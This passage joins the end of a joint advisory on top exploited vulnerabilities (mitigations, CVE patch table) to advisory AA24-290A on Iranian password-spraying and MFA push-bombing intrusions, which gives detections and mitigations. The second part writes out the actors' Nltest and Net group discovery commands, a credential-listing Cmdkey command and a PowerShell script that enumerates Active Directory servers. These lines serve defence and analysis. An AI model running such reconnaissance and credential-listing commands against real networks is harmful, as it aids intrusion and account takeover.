unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices [CPG 2.V, 2.W, 2.X]. Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP. Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting. Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM). Implement Zero Trust Network Architecture (ZTNA) to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks [CPG 2.F, 2.X]. Note: See CISA’s Zero Trust Maturity Model and the Department of Defense’s Zero Trust Reference Architecture for additional information on Zero Trust. Continuously monitor the attack surface and investigate abnormal activity that may indicate cyber actor or malware lateral movement [CPG 2.T]. Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure EDR, SIEM, vulnerability scanners, and other similar tools are reporting the same number of assets [CPG 2.T, 2.V]. Use web application firewalls to monitor and filter web traffic. These tools are commercially available via hardware, software, and cloud-based solutions, and may detect and mitigate exploitation attempts where a cyber actor sends a malicious web request to an unpatched device [CPG 2.B, 2.F]. Implement an administrative policy and/or automated process configured to monitor unwanted hardware, software, or programs against an allowlist with specified, approved versions [CPG 2.Q]. Supply Chain Security Reduce third-party applications and unique system/application builds—provide exceptions only if required to support business critical functions [CPG 2.Q]. Ensure contracts require vendors and/or third-party service providers to: Provide notification of security incidents and vulnerabilities within a risk informed time frame [CPG 1.G, 1.H, 1.I]. Supply a Software Bill of Materials (SBOM) with all products to enhance vulnerability monitoring and to help reduce time to respond to identified vulnerabilities [CPG 4.B]. Ask your software providers to discuss their secure by design program, provide links to information about how they are working to remove classes of vulnerabilities, and to set secure default settings. Resources For information on the top vulnerabilities routinely exploited in 2016–2019, 2020, 2021, and 2022: Joint CSA Top 10 Routinely Exploited Vulnerabilities. Joint CSA Top Routinely Exploited Vulnerabilities. Joint CSA 2021 Top Routinely Exploited Vulnerabilities. Joint CSA 2022 Top Routinely Exploited Vulnerabilities. See the Appendix for additional partner resources on the vulnerabilities mentioned in this advisory. See ACSC’s Essential Eight Maturity Model for additional mitigations. See ACSC’s Cyber Supply Chain Risk Management for additional considerations and advice. References Apache Log4j Vulnerability Guidance Reporting U.S. organizations: All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov. Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca. New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654. United Kingdom organizations: Report a significant cyber security incident at gov.uk/report-cyber (monitored 24 hours). Disclaimer The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring. Version History November 12, 2024: Initial version. Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities CVE Vendor Affected Products and Versions Patch Information Resources CVE-2023-3519 Citrix NetScaler ADC and NetScaler Gateway: 13.1 before 13.1-49.13 13.0 before 13.0-91.13 NetScaler ADC: 13.1-FIPS before 13.1-37.159 12.1-FIPS before 12.1-55.297 12.1-NDcPP before 12.1-55.297 Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells Critical Security Update for NetScaler ADC and NetScaler Gateway CVE-2023-4966 Citrix NetScaler ADC and NetScaler Gateway: 14.1 before 14.1-8.50 13.1 before 13.1-49.15 13.0 before 13.0-92.19 NetScaler ADC: 13.1-FIPS before 13.1-37.164 12.1-FIPS before 12.1-55.300 12.1-NDcPP before 12.1-55.300 NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966 and CVE-2023-4967 #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability Critical Security Update for NetScaler ADC and NetScaler Gateway CVE-2023-20198 Cisco Any Cisco IOS XE Software with web UI feature enabled Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities CVE-2023-27997 Fortinet FortiOS-6K7K versions: 7.0.10, 7.0.5, 6.4.12 6.4.10, 6.4.8, 6.4.6, 6.4.2 6.2.9 through 6.2.13 6.2.6 through 6.2.7 6.2.4 6.0.12 through 6.0.16 6.0.10 Heap buffer overflow in sslvpn pre-authentication CVE-2023-34362 Progress MOVEit Transfer: 2023.0.0 (15.0) 2022.1.x (14.1) 2022.0.x (14.0) 2021.1.x (13.1) 2021.0.x (13.0) 2020.1.x (12.1) 2020.0.x (12.0) or older MOVEit Cloud MOVEit Transfer Critical Vulnerability #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability CVE-2023-22515 Atlassian 8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4 8.1.0, 8.1.1, 8.1.3, 8.1.4 8.2.0, 8.2.1, 8.2.2, 8.2.38.3.0, 8.3.1, 8.3.2 8.4.0, 8.4.1, 8.4.28.5.0, 8.5.1 Broken Access Control Vulnerability in Confluence Data Center and Server Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks CVE-2021- 44228 (Log4Shell) Apache Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA's GitHub repository. Apache Log4j Security Vulnerabilities For additional information, see joint advisory: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems CVE-2023-2868 Barracuda Networks 5.1.3.001 through 9.2.0.006 Barracuda Email Security Gateway Appliance (ESG) Vulnerability CVE-2022-47966 Zoho Multiple products, multiple versions. (For more details, see Security advisory for remote code execution vulnerability in multiple ManageEngine products) Security advisory for remote code execution vulnerability in multiple ManageEngine products CVE-2023-27350 PaperCut PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms. This includes: version 8.0.0 to 19.2.7 (inclusive) version 20.0.0 to 20.1.6 (inclusive) version 21.0.0 to 21.2.10 (inclusive) version 22.0.0 to 22.0.8 (inclusive) URGENT MF/NG vulnerability bulletin (March 2023) Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG CVE-2020-1472 Microsoft Netlogon Netlogon Elevation of Privilege Vulnerability Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2023-23397 Microsoft Outlook Microsoft Outlook Elevation of Privilege Vulnerability Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations CVE-2023-49103 ownCloud graphapi Disclosure of Sensitive Credentials and Configuration in Containerized Deployments CVE-2023-20273 Cisco Cisco IOS XE Software with web UI feature enabled Multiple Vulnerabilities in Cisco IOS XE Software Web UI Feature Guidance for Addressing Cisco IOS XE Web UI Vulnerabilities CVE-2023-42793 JetBrains In JetBrains TeamCity before 2023.05.4 CVE-2023-42793 Vulnerability in TeamCity: Post-Mortem Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally CVE-2023-22518 Atlassian All versions of Confluence Data Cetner and Confluence Server Improper Authorization in Confluence Data Center and Server CVE-2023-29492 — — — CVE-2021-27860 FatPipe WARP, MPVPN, IPVPN 10.1.2 and 10.2.2 FatPipe CVE List CVE-2021-40539 Zoho ManageEngine ADSelfService Plus builds up to 6113 Security advisory - ADSelfService Plus authentication bypass vulnerability ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors CVE-2023-0669 Fortra GoAnywhere versions 2.3 through 7.1.2 Fortra deserialization RCE #StopRansomware: CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability CVE-2021-22986 F5 BIG-IP versions: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986 CVE-2019-0708 Microsoft Remote Desktop Services Remote Desktop Services Remote Code Execution Vulnerability CVE-2018-13379 Fortinet FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests CVE-2023-35078 Ivanti All supported versions of Endpoint Manager Mobile (EPMM), including: Version 11.4 releases 11.10, 11.9 and 11.8 CVE-2023-35078 - New Ivanti EPMM Vulnerability Threat Actors Exploiting Ivanti EPMM Vulnerabilities CVE-2023-35081 Ivanti All supported versions of Endpoint Manager Mobile (EPMM), including 11.10, 11.9 and 11.8 CVE-2023-35081 - Remote Arbitrary File Write Threat Actors Exploiting Ivanti EPMM Vulnerabilities CVE-2023-36844 Juniper Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. 2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution CVE-2023-36845 Juniper Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. 2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution CVE-2023-36846 Juniper Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. 2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution CVE-2023-36847 Juniper Juniper Networks Junos OS on SRX Series and EX Series: All versions prior to 20.4R3-S9; 21.1 version 21.1R1 and later versions; 21.2 versions prior to 21.2R3-S7; 21.3 versions prior to 21.3R3-S5; 21.4 versions prior to 21.4R3-S5; 22.1 versions prior to 22.1R3-S4; 22.2 versions prior to 22.2R3-S2; 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; 22.4 versions prior to 22.4R2-S1, 22.4R3; 23.2 versions prior to 23.2R1-S1, 23.2R2. 2023-08 Out-of-Cycle Security Bulletin: Junos OS: SRX Series and EX Series: Multiple vulnerabilities in J-Web can be combined to allow a preAuth Remote Code Execution CVE-2023-41064 Apple Versions prior to: iOS 16.6.1 and iPadOS 16.6.1, macOS Monterey 12.6.9, macOS Ventura 13.5.2, iOS 15.7.9 and iPadOS 15.7.9, macOS Big Sur 11.7.10 About the security content of iOS 16.6.1 and iPadOS 16.6.1 About the security content of macOS Ventura 13.5.2 About the security content of iOS 15.7.9 and iPadOS 15.7.9 About the security content of macOS Monterey 12.6.9 About the security content of macOS Big Sur 11.7.10 CVE-2023-41061 Apple Versions prior to: watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1 About the security content of watchOS 9.6.2 About the security content of iOS 16.6.1 and iPadOS 16.6.1 CVE-2021-22205 GitLab All versions starting from 11.9 RCE when removing metadata with ExifTool CVE-2019-11510 Ivanti Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX CVE-2023-6448 Unitronics VisiLogic versions before 9.9.00 Unitronics Cybersecurity Advisory 2023-001: Default administrative password CVE-2017-6742 Cisco Simple Network Management Protocol subsystem of Cisco IOS 12.0 through 12.4 and 15.0 through 15.6 and IOS XE 2.2 through 3.17 SNMP Remote Code Execution Vulnerabilities in Cisco IOS and IOS XE Software CVE-2021-4034 Red Hat Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 8 Red Hat Virtualization 4 Any Red Hat product supported on Red Hat Enterprise Linux (including RHEL CoreOS) is also potentially impacted. RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034) Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2021-26084 Atlassian Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2021-33044 Dahua Various products — Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2021-33045 Dahua Various products — Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2022-3236 Sophos Sophos Firewall v19.0 MR1 (19.0.1) and older Resolved RCE in Sophos Firewall (CVE-2022-3236) Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2022-26134 Atlassian Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 Confluence Security Advisory 2022-06-02 Joint CSA: Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure CVE-2022-41040 Microsoft Microsoft Exchange servers Microsoft Exchange Server Elevation of Privilege Vulnerability CVE-2023-38831 RARLAB WinRAR Versions prior to 6.23 Beta 1 WinRAR 6.23 Beta 1 Released CVE-2019-18935 Progress Telerik Telerik.Web.UI.dll versions: Allows JavaScriptSerializer Deserialization Threat Actors Exploit Progress Telerik Vulnerabilities in Multiple U.S. Government IIS Servers CVE-2021-34473 Microsoft Exchange Server, Multiple Versions: Q1 2011 (2011.1.315) to R2 2017 SP1 (2017.2.621) R2 2017 SP2 (2017.2.711) to R3 2019 (2019.3.917) R3 2019 SP1 (2019.3.1023) R1 2020 (2020.1.114) and later Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities
Summary The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors’ use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors. The actors likely aim to obtain credentials and information describing the victim’s network that can then be sold to enable access to cybercriminals. Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) ‘push bombing’ to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access. The authoring agencies assess the Iranian actors sell this information on cybercriminal forums to actors who may use the information to conduct additional malicious activity. This advisory provides the actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). The information is derived from FBI engagements with entities impacted by this malicious activity. The authoring agencies recommend critical infrastructure organizations follow the guidance provided in the Mitigations section. At a minimum, organizations should ensure all accounts use strong passwords and register a second form of authentication. Download the PDF version of this report: AA24-290A Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations (PDF, 794.32 KB ) For a downloadable list of IOCs, see: AA24-290A STIX XML (XML, 96.61 KB ) AA24-290A STIX JSON (JSON, 81.92 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section in Appendix A for a table of the actors’ activity mapped to MITRE ATT&CK tactics and techniques. Overview of Activity The actors likely conduct reconnaissance operations to gather victim identity [T1589] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [T1110]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity’s systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation. Initial Access and Persistence The actors use valid user and group email accounts [T1078], frequently obtained via brute force such as password spraying [T1110.003] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [T1078.004], and Citrix systems [T1133]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique—bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications— is known as “MFA fatigue” or “push bombing” [T1621]. Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account: In two confirmed compromises, the actors leveraged a compromised user’s open registration for MFA [T1556.006] to register the actor’s own device [T1098.005] to access the environment. In another confirmed compromise, the actors used a self-service password reset (SSPR) tool associated with a public facing Active Directory Federation Service (ADFS) to reset the accounts with expired passwords [T1484.002] and then registered MFA through Okta for compromised accounts without MFA already enabled [T1556] [T1556.006]. The actors frequently conduct their activity using a virtual private network (VPN) service [T1572]. Several of the IP addresses in the actors’ malicious activity originate from exit nodes tied to the Private Internet Access VPN service. Lateral Movement The actors use Remote Desktop Protocol (RDP) for lateral movement [T1021.001]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary mstsc.exe [T1202]. Credential Access The actors likely use open-source tools and methodologies to gather more credentials. The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [T1558.003]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [T1105] DomainPasswordSpray.ps1, which is openly available on GitHub [T1588.002], likely to conduct password spraying. The actors also used the command Cmdkey /list, likely to display usernames and credentials [T1555]. Privilege Escalation In one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft’s Netlogon (also known as ”Zerologon”) privilege escalation vulnerability (CVE-2020-1472) [T1068]. Discovery The actors leverage living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [T1018], trusted domains [T1482], lists of domain administrators, and enterprise administrators [T1087.002] [T1069.002] [T1069.003]: Nltest /dclist Nltest /domain_trusts Nltest /domain_trusts/all_trusts Net group “Enterprise admins” /domain Net group “Domain admins” /domain Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [T1059.001]to search the AD for computer display names, operating systems, descriptions, and distinguished names [T1082]. $i=0 $D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $L='LDAP://' . $D $D = [ADSI]$L $Date = $((Get-Date).AddDays(-90).ToFileTime()) $str = '(&(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))' $s = [adsisearcher]$str $s.searchRoot = $L.$D.distinguishedName $s.PropertiesToLoad.Add('cn') > $Null $s.PropertiesToLoad.Add('operatingsystem') > $Null $s.PropertiesToLoad.Add('description') > $Null $s.PropertiesToLoad.Add('distinguishedName') > $Null Foreach ($CA in $s.FindAll()) { Write-Host $CA.Properties.Item('cn') $CA.Properties.Item('operatingsystem') $CA. Properties.Item('description') $CA.Properties.Item('distinguishedName') $i++ } Write-host Total servers: $i Command and Control On one occasion, using msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [T1071.001]. Exfiltration and Collection In a couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization’s inventory [T1005], likely exfiltrating the files to further persist in the victim network or to sell the information online. Detection To detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts. To detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps: Look for “impossible logins,” such as suspicious logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the user’s expected geographic location. Look for one IP used for multiple accounts, excluding expected logins. Look for “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses with significant geographic distance (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the period between the logins). Note: Implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks. Look for MFA registrations with MFA in unexpected locales or from unfamiliar devices. Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the ntds.dit file from a domain controller. Look for suspicious privileged account use after resetting passwords or applying user account mitigations. Look for unusual activity in typically dormant accounts. Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity. Mitigations The authoring agencies recommend organizations implement the mitigations below to improve organizations’ cybersecurity posture based on the actors’ TTPs described in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy for user verification or password strength, creating a security gap. Avoid common passwords (e.g. “Spring2024” or “Password123!”). Disable user accounts and access to organizational resources for departing staff [CPG 2.D]. Disabling accounts can minimize system exposure, removing options actors can leverage for entry into the system. Similarly, create new user accounts as close as possible to an employee’s start date. Implement phishing-resistant MFA [CPG 2.H]. See CISA’s resources Phishing-Resistant Multifactor Authentication and More than a Password for additional information on strengthening user credentials. Continuously review MFA settings to ensure coverage over all active, internet-facing protocols to ensure no exploitable services are exposed [CPG 2.W]. Provide basic cybersecurity training to users [CPG 2.I] covering concepts such as: Detecting unsuccessful login attempts [CPG 2.G]. Having users deny MFA requests they have not generated. Ensuring users with MFA-enabled accounts have MFA set up appropriately. Ensure password policies align with the latest NIST Digital Identity Guidelines. Meeting the minimum password strength [CPG 2.B] by creating a password using 8-64 nonstandard characters and long passphrases, when possible. Disable the use of RC4 for Kerberos authentication. These mitigations apply to critical infrastructure entities across sectors. The authoring agencies also recommend software manufacturers incorporate secure by design principles and tactics into their software development practices to protect their customers against actors using compromised credentials, thereby strengthening the security posture of their customers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide. Validate Security Controls In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating organization security programs against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 1 to Table 12). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Contact Information Organizations are encouraged to report suspicious or criminal activity related to information in this advisory to: CISA via CISA’s 24/7 Operations Center [report@cisa.gov or 1-844-Say-CISA (1-844-729-2472)] or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov. Disclaimer The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies. Intrusion events connected to this Iranian group may also include a different set of cyber actors–likely the third-party actors who purchased access from the Iranian group via cybercriminal forums or other channels. As a result, some TTPs and IOCs noted in this advisory may be tied to these third-party actors, not the Iranian actors. The TTPs and IOCs are in the advisory to provide recipients the most complete picture of malicious activity that may be observed on compromised networks. However, exercise caution if formulating attribution assessments based solely on matching TTPs and IOCs. Version History October 16, 2024: Initial version. Appendix A: MITRE ATT&CK Tactics and Techniques See Tables 1–12 for all referenced actors’ tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 1: Reconnaissance Technique Title ID Use Gather Victim Identity Information T1589 The actors likely gathered victim information. Table 2: Resource Development Technique Title ID Use Obtain Capabilities: Tool T1588.002 The actors obtained a password spray tool through an open-source repository. Table 3: Initial Access Technique Title ID Use Valid Accounts T1078 The actors used password spraying to obtain valid user and group email account credentials, allowing them access to the network. Valid Accounts: Cloud Accounts T1078.004 The actors used accounts hosted on Microsoft 365, Azure, and Okta cloud environments as additional methods for initial access. External Remote Services T1133 The actors exploited Citrix systems’ external-facing remote services as another method for gaining initial access to the system. Table 4: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 The actors used PowerShell commands to maintain and expand access. Table 5: Persistence Technique Title ID Use Account Manipulation: Device Registration T1098.005 The actors used PowerShell commands to maintain and expand access. Modify Authentication Process T1556 The actors used a public facing Active Directory Federation Service (ADFS) domain to reset the passwords of expired accounts. Modify Authentication Process: Multi-Factor Authentication T1556.006 The actors used an MFA bypass method, such as Multi-Factor Authentication Request Generation, providing the ability to modify or completely disable MFA defenses. Table 6: Privilege Escalation Technique Title ID Use Exploitation for Privilege Escalation T1068 The actors attempted impersonation of the domain controller likely by exploiting CVE-2020-1472, Microsoft’s Netlogon Privilege Escalation vulnerability. Domain or Tenant Policy Modification: Trust Modification T1484.002 The actors leveraged a public-facing ADFS password reset tool to reactivate inactive accounts, allowing the actor to authenticate and enroll their devices as any user in the AD managed by the victim tenant. Table 7: Defense Evasion Technique Title ID Use Indirect Command Execution T1202 The actors attempted impersonation of the Domain Controller likely by exploiting CVE-2020-1472, Microsoft’s Netlogon Privilege Escalation vulnerability. Table 8: Credential Access Technique Title ID Use Brute Force: Password Spraying T1110.003 The actors targeted applications, including Single Sign-on (SSO) Microsoft Office 365, using brute force password sprays and imported the tool DomainPasswordSpray.ps1. Credentials from Password Stores T1555 The actors used the command Cmdkey /list likely to display usernames and credentials. Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Rivest Cipher 4 (RC4) tickets. Multi-Factor Authentication Request Generation T1621 The actors sent MFA requests to legitimate users. Table 9: Discovery Technique Title ID Use Remote System Discovery T1018 The actors used LOTL to return information about domain controllers. Permission Groups Discovery: Domain Groups T1069.002 The actors used LOTL to return lists of domain administrators and enterprise administrators. Permission Groups Discovery: Cloud Groups T1069.003 The actors used LOTL to return lists of domain administrators and enterprise administrators. System Information Discovery T1082 The actors were able to query the AD to discover display names, operating systems, descriptions, and distinguished names from the computer. Account Discovery: Domain Account T1087.002 The actors used LOTL to return lists of domain administrators and enterprise administrators. Domain Trust Discovery T1482 The actors used LOTL to return information about trusted domains. Table 10: Lateral Movement Technique Title ID Use Remote Services: Remote Desktop Protocol T1021.001 The actors used Microsoft Word to open PowerShell to launch RDP binary mstsc.exe. Table 11: Collection Technique Title ID Use Data from Local System T1005 The actors downloaded files related to remote access methods and the organization’s inventory. Table 12: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 The actors used msedge.exe to make outbound connections likely to Cobalt Strike Beacon C2 infrastructure. Ingress Tool Transfer T1105 The actors imported a tool from GitHub and used it to conduct password spraying. Protocol Tunneling T1572 The actors frequently conduct targeting using a virtual private network (VPN). Appendix B: Indicators of Compromise See Tables 13 to 15 for IOCs obtained from FBI investigations. Table 13: Malicious Files Associated with Iranian Cyber Actors Hash Description 1F96D15B26416B2C7043EE7172357AF3AFBB002A Associated with malicious activity. 3D3CDF7CFC881678FEBCAFB26AE423FE5AA4EFEC Associated with malicious activity. Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking, as many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains. Many of the IP addresses provided below are assessed VPN nodes and as such are not exclusive to the Iranian actors’ use. The authoring organizations do not recommend blocking these IP addresses based solely on their inclusion in this 